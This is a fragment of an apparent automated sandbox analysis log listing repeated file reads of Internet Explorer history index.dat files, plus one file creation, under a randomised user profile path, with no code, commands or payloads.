| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat, size = 8, size_out = 8 |
|
1 | |
